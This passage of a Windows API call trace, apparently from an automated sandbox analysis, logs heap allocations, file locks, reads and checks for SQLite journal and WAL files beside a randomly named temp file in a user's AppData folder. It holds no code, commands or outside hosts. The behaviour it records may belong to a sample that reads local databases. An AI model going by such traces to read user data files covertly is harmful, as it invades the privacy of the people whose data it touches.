dwFileOffsetLow=0x40000000, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x1, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0203.196] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2e12512, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 66 [0203.196] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x84) returned 0x2e12910 [0203.196] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2e12512, cbMultiByte=-1, lpWideCharStr=0x2e12910, cchWideChar=66 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\aIBiywy.tmp-journal") returned 66 [0203.196] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\aIBiywy.tmp-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\aibiywy.tmp-journal"), fInfoLevelId=0x0, lpFileInformation=0x415f538 | out: lpFileInformation=0x415f538*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0203.196] GetLastError () returned 0x2 [0203.196] HeapFree (in: hHeap=0x2e10000, dwFlags=0x0, lpMem=0x2e12910 | out: hHeap=0x2e10000) returned 1 [0203.196] GetFileSize (in: hFile=0x2a0, lpFileSizeHigh=0x415f574 | out: lpFileSizeHigh=0x415f574*=0x0) returned 0x4800 [0203.196] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2e12554, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0203.196] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x7c) returned 0x2e12910 [0203.196] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2e12554, cbMultiByte=-1, lpWideCharStr=0x2e12910, cchWideChar=62 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\aIBiywy.tmp-wal") returned 62 [0203.196] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\aIBiywy.tmp-wal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\aibiywy.tmp-wal"), fInfoLevelId=0x0, lpFileInformation=0x415f558 | out: lpFileInformation=0x415f558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0203.196] GetLastError () returned 0x2 [0203.196] HeapFree (in: hHeap=0x2e10000, dwFlags=0x0, lpMem=0x2e12910 | out: hHeap=0x2e10000) returned 1 [0203.196] GetFileSize (in: hFile=0x2a0, lpFileSizeHigh=0x415f58c | out: lpFileSizeHigh=0x415f58c*=0x0) returned 0x4800 [0203.196] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x50) returned 0x2e12910 [0203.196] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x408) returned 0x2e1f3b0 [0203.196] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x890) returned 0x44f0048 [0203.196] SetFilePointer (in: hFile=0x2a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x415f5a0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x415f5a0*=0) returned 0x0 [0203.197] ReadFile (in: hFile=0x2a0, lpBuffer=0x44f0074, nNumberOfBytesToRead=0x800, lpNumberOfBytesRead=0x415f5ac, lpOverlapped=0x0 | out: lpBuffer=0x44f0074*, lpNumberOfBytesRead=0x415f5ac*=0x800, lpOverlapped=0x0) returned 1 [0203.197] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x240) returned 0x2e1f7c0 [0203.197] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x658) returned 0x44f08e0 [0203.197] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0xf8) returned 0x2e1fa08 [0203.197] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x408) returned 0x2e1fb08 [0203.197] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x2f0) returned 0x44f0f40 [0203.197] HeapFree (in: hHeap=0x2e10000, dwFlags=0x0, lpMem=0x44f0f40 | out: hHeap=0x2e10000) returned 1 [0203.197] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0xf8) returned 0x44f0f40 [0203.197] HeapFree (in: hHeap=0x2e10000, dwFlags=0x0, lpMem=0x44f08e0 | out: hHeap=0x2e10000) returned 1 [0203.197] HeapFree (in: hHeap=0x2e10000, dwFlags=0x0, lpMem=0x2e1f7c0 | out: hHeap=0x2e10000) returned 1 [0203.198] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x168) returned 0x2e1f7c0 [0203.198] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x240) returned 0x44f08e0 [0203.198] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x658) returned 0x44f1040 [0203.198] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x10) returned 0x2e12968 [0203.198] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x58) returned 0x2e1ff18 [0203.198] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x10) returned 0x2e12980 [0203.198] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0xc8) returned 0x2e1f930 [0203.198] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x18) returned 0x2e1ff78 [0203.199] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x20) returned 0x2e1ff98 [0203.199] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x18) returned 0x2e1ffc0 [0203.199] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x58) returned 0x44f0b28 [0203.199] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x10) returned 0x2e12998 [0203.199] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x68) returned 0x44f0b88 [0203.199] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x20) returned 0x44f0bf8 [0203.199] HeapFree (in: hHeap=0x2e10000, dwFlags=0x0, lpMem=0x2e12998 | out: hHeap=0x2e10000) returned 1 [0203.199] HeapFree (in: hHeap=0x2e10000, dwFlags=0x0, lpMem=0x44f0b28 | out: hHeap=0x2e10000) returned 1 [0203.199] HeapFree (in: hHeap=0x2e10000, dwFlags=0x0, lpMem=0x2e1ffc0 | out: hHeap=0x2e10000) returned 1 [0203.199] HeapFree (in: hHeap=0x2e10000, dwFlags=0x0, lpMem=0x2e1ff98 | out: hHeap=0x2e10000) returned 1 [0203.199] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x20) returned 0x2e1ff98 [0203.199] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x18) returned 0x2e1ffc0 [0203.200] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x58) returned 0x44f0b28 [0203.201] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x10) returned 0x2e12998 [0203.201] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x68) returned 0x44f0c20 [0203.201] HeapFree (in: hHeap=0x2e10000, dwFlags=0x0, lpMem=0x44f0c20 | out: hHeap=0x2e10000) returned 1 [0203.201] HeapFree (in: hHeap=0x2e10000, dwFlags=0x0, lpMem=0x2e12998 | out: hHeap=0x2e10000) returned 1 [0203.201] HeapFree (in: hHeap=0x2e10000, dwFlags=0x0, lpMem=0x44f0b28 | out: hHeap=0x2e10000) returned 1 [0203.201] HeapFree (in: hHeap=0x2e10000, dwFlags=0x0, lpMem=0x2e1ffc0 | out: hHeap=0x2e10000) returned 1 [0203.201] HeapFree (in: hHeap=0x2e10000, dwFlags=0x0, lpMem=0x2e1ff98 | out: hHeap=0x2e10000) returned 1 [0203.201] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x10) returned 0x2e12998 [0203.201] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x18) returned 0x2e1ff98 [0203.201] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x20) returned 0x2e1ffb8 [0203.201] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0xf8) returned 0x44f0c20 [0203.201] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x408) returned 0x44fbf08 [0203.201] HeapFree (in: hHeap=0x2e10000, dwFlags=0x0, lpMem=0x44f1040 | out: hHeap=0x2e10000) returned 1 [0203.202] HeapFree (in: hHeap=0x2e10000, dwFlags=0x0, lpMem=0x44f08e0 | out: hHeap=0x2e10000) returned 1 [0203.202] HeapFree (in: hHeap=0x2e10000, dwFlags=0x0, lpMem=0x44fbf08 | out: hHeap=0x2e10000) returned 1 [0203.202] HeapFree (in: hHeap=0x2e10000, dwFlags=0x0, lpMem=0x44f0c20 | out: hHeap=0x2e10000) returned 1 [0203.202] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x2a0) returned 0x44f08e0 [0203.202] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x240) returned 0x44f0c20 [0203.202] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x658) returned 0x44f1040 [0203.202] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x10) returned 0x44f0e68 [0203.202] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x58) returned 0x44f0e80 [0203.202] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x18) returned 0x44fbf20 [0203.203] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0xc8) returned 0x44fcb08 [0203.203] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x10) returned 0x44f0ee0 [0203.203] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x18) returned 0x44fbf40 [0203.203] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x10) returned 0x44fcbf0 [0203.203] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x20) returned 0x44f0ef8 [0203.203] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x10) returned 0x44fcc08 [0203.203] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x18) returned 0x44fbf60 [0203.203] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x10) returned 0x44fcc20 [0203.203] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x20) returned 0x44fcfd8 [0203.203] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x10) returned 0x44fcc38 [0203.203] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x18) returned 0x44fbf80 [0203.204] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x10) returned 0x44fcc50 [0203.204] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x18) returned 0x44fbfa0 [0203.204] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x10) returned 0x44fcc68 [0203.204] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x18) returned 0x44fbfc0 [0203.204] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x10) returned 0x44fcc80 [0203.204] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x18) returned 0x44fbfe0 [0203.204] RtlReAllocateHeap (Heap=0x2e10000, Flags=0x0, Ptr=0x44fcb08, Size=0x188) returned 0x44fd000 [0203.204] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x10) returned 0x44fcc98 [0203.204] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x18) returned 0x44fc000 [0203.204] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x10) returned 0x44fccb0 [0203.204] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x20) returned 0x44fcb08 [0203.204] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x10) returned 0x44fccc8 [0203.204] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x10) returned 0x44fcce0 [0203.204] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x10) returned 0x44fccf8 [0203.204] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x18) returned 0x44fc020 [0203.204] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x10) returned 0x44fcd10 [0203.205] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x20) returned 0x44fcb30 [0203.205] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x10) returned 0x44fcd28 [0203.205] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x18) returned 0x44fc040 [0203.205] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x10) returned 0x44fcd40 [0203.205] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x18) returned 0x44fc060 [0203.205] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x10) returned 0x44fcd58 [0203.205] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x18) returned 0x44fc080 [0203.205] RtlReAllocateHeap (Heap=0x2e10000, Flags=0x0, Ptr=0x44fd000, Size=0x248) returned 0x44fd000 [0203.205] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x10) returned 0x44fcd70 [0203.205] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x18) returned 0x44fc0a0 [0203.205] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x10) returned 0x44fcd88 [0203.205] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x18) returned 0x44fc0c0 [0203.205] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x10) returned 0x44fcda0 [0203.205] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x18) returned 0x44fc0e0 [0203.206] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x10) returned 0x44fcdb8 [0203.206] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x18) returned 0x44fc100 [0203.206] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x10) returned 0x44fcdd0 [0203.207] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x28) returned 0x44fcb58 [0203.207] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x10) returned 0x44fcde8 [0203.207] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x18) returned 0x44fc120 [0203.207] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x58) returned 0x44fd250 [0203.207] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x18) returned 0x44fc140 [0203.207] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x20) returned 0x44fcb88 [0203.207] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x18) returned 0x44fc160 [0203.207] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x20) returned 0x44fcbb0 [0203.207] RtlReAllocateHeap (Heap=0x2e10000, Flags=0x0, Ptr=0x44fd250, Size=0xf8) returned 0x44fd250 [0203.207] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x18) returned 0x44fc180 [0203.207] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x28) returned 0x44fd350 [0203.207] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0xa0) returned 0x44fd380 [0203.207] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x20) returned 0x44fd428 [0203.208] HeapFree (in: hHeap=0x2e10000, dwFlags=0x0, lpMem=0x44fc140 | out: hHeap=0x2e10000) returned 1 [0203.208] HeapFree (in: hHeap=0x2e10000, dwFlags=0x0, lpMem=0x44fcb88 | out: hHeap=0x2e10000) returned 1 [0203.208] HeapFree (in: hHeap=0x2e10000, dwFlags=0x0, lpMem=0x44fc160 | out: hHeap=0x2e10000) returned 1 [0203.208] HeapFree (in: hHeap=0x2e10000, dwFlags=0x0, lpMem=0x44fcbb0 | out: hHeap=0x2e10000) returned 1 [0203.208] HeapFree (in: hHeap=0x2e10000, dwFlags=0x0, lpMem=0x44fc180 | out: hHeap=0x2e10000) returned 1 [0203.208] HeapFree (in: hHeap=0x2e10000, dwFlags=0x0, lpMem=0x44fd250 | out: hHeap=0x2e10000) returned 1 [0203.208] HeapFree (in: hHeap=0x2e10000, dwFlags=0x0, lpMem=0x44fc120 | out: hHeap=0x2e10000) returned 1 [0203.208] HeapFree (in: hHeap=0x2e10000, dwFlags=0x0, lpMem=0x44fd350 | out: hHeap=0x2e10000) returned 1 [0203.208] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x20) returned 0x44fd468 [0203.208] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0xf8) returned 0x44fd250 [0203.208] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x408) returned 0x44fdc50 [0203.209] HeapFree (in: hHeap=0x2e10000, dwFlags=0x0, lpMem=0x44f1040 | out: hHeap=0x2e10000) returned 1 [0203.209] HeapFree (in: hHeap=0x2e10000, dwFlags=0x0, lpMem=0x44f0c20 | out: hHeap=0x2e10000) returned 1 [0203.209] HeapFree (in: hHeap=0x2e10000, dwFlags=0x0, lpMem=0x44fdc50 | out: hHeap=0x2e10000) returned 1 [0203.209] HeapFree (in: hHeap=0x2e10000, dwFlags=0x0, lpMem=0x44fd250 | out: hHeap=0x2e10000) returned 1 [0203.209] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x240) returned 0x44f0c20 [0203.209] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x658) returned 0x44f1040 [0203.209] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x18) returned 0x44fc120 [0203.209] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x58) returned 0x44fd250 [0203.210] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x18) returned 0x44fc180 [0203.210] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x48) returned 0x44fcb88 [0203.210] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x10) returned 0x44fce00 [0203.210] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x10) returned 0x44fce18 [0203.210] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x18) returned 0x44fc160 [0203.210] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x60) returned 0x44fd2b0 [0203.210] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x20) returned 0x44fd490 [0203.210] HeapFree (in: hHeap=0x2e10000, dwFlags=0x0, lpMem=0x44fc180 | out: hHeap=0x2e10000) returned 1 [0203.210] HeapFree (in: hHeap=0x2e10000, dwFlags=0x0, lpMem=0x44fd250 | out: hHeap=0x2e10000) returned 1 [0203.210] HeapFree (in: hHeap=0x2e10000, dwFlags=0x0, lpMem=0x44fc120 | out: hHeap=0x2e10000) returned 1 [0203.210] HeapFree (in: hHeap=0x2e10000, dwFlags=0x0, lpMem=0x44fce18 | out: hHeap=0x2e10000) returned 1 [0203.210] HeapFree (in: hHeap=0x2e10000, dwFlags=0x0, lpMem=0x44fce00 | out: hHeap=0x2e10000) returned 1 [0203.210] HeapFree (in: hHeap=0x2e10000, dwFlags=0x0, lpMem=0x44fcb88 | out: hHeap=0x2e10000) returned 1 [0203.210] HeapFree (in: hHeap=0x2e10000, dwFlags=0x0, lpMem=0x44fc160 | out: hHeap=0x2e10000) returned 1 [0203.210] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0xf8) returned 0x44fdc50 [0203.211] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x408) returned 0x44fdd50 [0203.211] HeapFree (in: hHeap=0x2e10000, dwFlags=0x0, lpMem=0x44f1040 | out: hHeap=0x2e10000) returned 1 [0203.211] HeapFree (in: hHeap=0x2e10000, dwFlags=0x0, lpMem=0x44f0c20 | out: hHeap=0x2e10000) returned 1 [0203.211] HeapFree (in: hHeap=0x2e10000, dwFlags=0x0, lpMem=0x44fdd50 | out: hHeap=0x2e10000) returned 1 [0203.211] HeapFree (in: hHeap=0x2e10000, dwFlags=0x0, lpMem=0x44fdc50 | out: hHeap=0x2e10000) returned 1 [0203.211] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x240) returned 0x44f0c20 [0203.211] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x658) returned 0x44f1040 [0203.211] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x10) returned 0x44fce00 [0203.211] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x58) returned 0x44fd250 [0203.211] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x18) returned 0x44fc160 [0203.212] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0xc8) returned 0x44fdc50 [0203.212] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x10) returned 0x44fce18 [0203.212] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x18) returned 0x44fc120 [0203.212] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x10) returned 0x44fce30 [0203.212] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x18) returned 0x44fc180 [0203.212] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x10) returned 0x44fce48 [0203.212] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x18) returned 0x44fc140 [0203.212] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x10) returned 0x44fce60 [0203.212] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x18) returned 0x44fc1a0 [0203.212] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x58) returned 0x44fd318 [0203.212] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x18) returned 0x44fc1c0 [0203.212] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x18) returned 0x44fc1e0 [0203.213] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x28) returned 0x44fcb88 [0203.213] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x78) returned 0x44fdd20 [0203.213] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x20) returned 0x44fd4b8 [0203.213] HeapFree (in: hHeap=0x2e10000, dwFlags=0x0, lpMem=0x44fc1c0 | out: hHeap=0x2e10000) returned 1 [0203.213] HeapFree (in: hHeap=0x2e10000, dwFlags=0x0, lpMem=0x44fc1e0 | out: hHeap=0x2e10000) returned 1 [0203.213] HeapFree (in: hHeap=0x2e10000, dwFlags=0x0, lpMem=0x44fd318 | out: hHeap=0x2e10000) returned 1 [0203.213] HeapFree (in: hHeap=0x2e10000, dwFlags=0x0, lpMem=0x44fc1a0 | out: hHeap=0x2e10000) returned 1 [0203.213] HeapFree (in: hHeap=0x2e10000, dwFlags=0x0, lpMem=0x44fcb88 | out: hHeap=0x2e10000) returned 1 [0203.213] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x20) returned 0x44fd4e0 [0203.213] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0xf8) returned 0x44fdda0 [0203.213] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x408) returned 0x44fdea0 [0203.213] HeapFree (in: hHeap=0x2e10000, dwFlags=0x0, lpMem=0x44f1040 | out: hHeap=0x2e10000) returned 1 [0203.213] HeapFree (in: hHeap=0x2e10000, dwFlags=0x0, lpMem=0x44f0c20 | out: hHeap=0x2e10000) returned 1 [0203.214] HeapFree (in: hHeap=0x2e10000, dwFlags=0x0, lpMem=0x44fdea0 | out: hHeap=0x2e10000) returned 1 [0203.214] HeapFree (in: hHeap=0x2e10000, dwFlags=0x0, lpMem=0x44fdda0 | out: hHeap=0x2e10000) returned 1 [0203.214] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x240) returned 0x44f0c20 [0203.214] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x658) returned 0x44f1040 [0203.214] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x18) returned 0x44fc1a0 [0203.214] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x58) returned 0x44fd318 [0203.214] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x18) returned 0x44fc1e0 [0203.214] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x48) returned 0x44fcb88 [0203.214] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x10) returned 0x44fce78 [0203.215] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x10) returned 0x44fce90 [0203.215] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x18) returned 0x44fc1c0 [0203.215] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x60) returned 0x44fdda0 [0203.215] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x20) returned 0x44fd508 [0203.215] HeapFree (in: hHeap=0x2e10000, dwFlags=0x0, lpMem=0x44fc1e0 | out: hHeap=0x2e10000) returned 1 [0203.215] HeapFree (in: hHeap=0x2e10000, dwFlags=0x0, lpMem=0x44fd318 | out: hHeap=0x2e10000) returned 1 [0203.215] HeapFree (in: hHeap=0x2e10000, dwFlags=0x0, lpMem=0x44fc1a0 | out: hHeap=0x2e10000) returned 1 [0203.215] HeapFree (in: hHeap=0x2e10000, dwFlags=0x0, lpMem=0x44fce90 | out: hHeap=0x2e10000) returned 1 [0203.215] HeapFree (in: hHeap=0x2e10000, dwFlags=0x0, lpMem=0x44fce78 | out: hHeap=0x2e10000) returned 1 [0203.215] HeapFree (in: hHeap=0x2e10000, dwFlags=0x0, lpMem=0x44fcb88 | out: hHeap=0x2e10000) returned 1 [0203.215] HeapFree (in: hHeap=0x2e10000, dwFlags=0x0, lpMem=0x44fc1c0 | out: hHeap=0x2e10000) returned 1 [0203.215] HeapFree (in: hHeap=0x2e10000, dwFlags=0x0, lpMem=0x44f1040 | out: hHeap=0x2e10000) returned 1 [0203.215] HeapFree (in: hHeap=0x2e10000, dwFlags=0x0, lpMem=0x44f0c20 | out: hHeap=0x2e10000) returned 1 [0203.215] HeapFree (in: hHeap=0x2e10000, dwFlags=0x0, lpMem=0x44fdf08 | out: hHeap=0x2e10000) returned 1 [0203.215] HeapFree (in: hHeap=0x2e10000, dwFlags=0x0, lpMem=0x44fde08 | out: hHeap=0x2e10000) returned 1 [0203.215] HeapFree (in: hHeap=0x2e10000, dwFlags=0x0, lpMem=0x44f08e0 | out: hHeap=0x2e10000) returned 1 [0203.215] HeapFree (in: hHeap=0x2e10000, dwFlags=0x0, lpMem=0x2e1f7c0 | out: hHeap=0x2e10000) returned 1 [0203.215] UnlockFile (hFile=0x2a0, dwFileOffsetLow=0x40000002, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x1fe, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0203.216] HeapFree (in: hHeap=0x2e10000, dwFlags=0x0, lpMem=0x2e1fb08 | out: hHeap=0x2e10000) returned 1 [0203.216] HeapFree (in: hHeap=0x2e10000, dwFlags=0x0, lpMem=0x44f0f40 | out: hHeap=0x2e10000) returned 1 [0203.216] HeapFree (in: hHeap=0x2e10000, dwFlags=0x0, lpMem=0x2e1fa08 | out: hHeap=0x2e10000) returned 1 [0203.216] HeapFree (in: hHeap=0x2e10000, dwFlags=0x0, lpMem=0x44f0f20 | out: hHeap=0x2e10000) returned 1 [0203.216] HeapFree (in: 